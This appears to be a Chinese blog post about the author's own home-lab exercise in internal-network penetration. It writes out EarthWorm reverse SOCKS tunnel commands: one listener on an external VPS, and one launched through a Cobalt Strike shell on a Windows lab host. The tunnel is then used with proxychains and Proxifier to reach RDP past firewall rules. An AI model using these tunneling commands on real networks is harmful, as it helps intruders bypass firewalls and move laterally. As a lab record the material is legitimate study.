題記
操作的成功真是一件有成就感的事情,也驗證了理論的成功實現。我在這里首先介紹下我的心路歷程,我只有一台香港kali服務器(103.234.72.5),本地在開啟一台真實機器(192.168.1.7)與一台win8虛擬機(192.168.1.132:這是一台集合靶場也開啟了3389,同時我也用它來當內網穿透的通道。)與一台kali2019。我想完成是kali掛代理進行內網滲透,所以有了第一個實驗。重點是第二個實驗,我的真實機器和win8是一個內網,3389連接成功我不知道是代理過去成功,還是直接本地連接成功。所以經過我的思考,我在win8(132)用防火牆禁止192.168.1.7(真實機)訪問,所有服務都是不通的,所以此時遠程桌面也是失敗,然后真實機掛上代理103.234.72.5:1080(這個代理是走內網132的流量),然后重新連接132,發現成功連接。
Ew代理問題看我上一個博客:https://www.cnblogs.com/sunny11/p/14307502.html
Proxifier代理問題看我上上個博客:http://cnblogs.com/sunny11/p/14273947.html
上午完成后我想加大難度了,是的,變化就是這么快。我會用下圖表示出來。這個過程在防火牆踩坑了,哎。這次采用192.168.1.132,1.7,1.3做實驗,1.7不能連接132與3,然后在132配置內網穿透,7連接代理,就可以訪問132與3了。
1、Kali配置代理連接192.168.1.132:3389
1、添加代理
這個代理是用我外網vps進行內網穿透代理出來的。
vim /etc/proxychains4.conf
2、使用代理進行操作
proxychains4 rdesktop -f -a 16 192.168.1.132:3389
2.1 kali成功登錄
2.2 被控端顯示
2、windows配置代理連接192.168.1.3:3389
2.1防火牆設置
1、先在192.168.1.3與192.168.1.132上配置規則,禁止192.168.1.7訪問任何端口。
防火牆高級設置中選入站規則設置,添加ip
2、規則設置這步很重要,一定要選下面的ip。
3、.7嘗試連接132與3的遠程桌面,失敗。win+R=>mstsc。
2.2 ew代理添加
Vps添加命令./ew_linux_x64 -s rcsocks -l 1080 -e 5555
CS添加命令shell C:\release\ew_win32.exe -s rssocks -d 103.234.72.5 -e 5555
2.3 本機192.168.1.7通過proxifier掛代理
添加服務器
添加路由規則
2.4 遠程桌面連接192.168.1.3
2.5日志查看
在192.168.1.3上可以查看到登錄日志ip顯示132登錄的。
